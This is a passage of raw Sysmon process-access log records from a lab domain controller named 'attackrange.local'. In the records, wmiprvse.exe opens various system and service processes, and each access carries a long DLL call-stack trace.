Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005435Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005434Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3200-000000009101}2472C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005433Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005432Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3100-000000009101}2528C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005431Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005430Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005429Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005428Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2F00-000000009101}416C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005427Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005426Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2E00-000000009101}2212C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005425Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005424Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005423Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005422Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2C00-000000009101}2484C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005421Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005420Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8551-5FCF-2B00-000000009101}2636C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005419Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005418Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-854A-5FCF-2800-000000009101}2684C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005417Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005416Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2600-000000009101}2468C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005415Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005414Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8548-5FCF-2500-000000009101}2304C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005413Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005412Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.766{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8546-5FCF-2400-000000009101}3056C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Co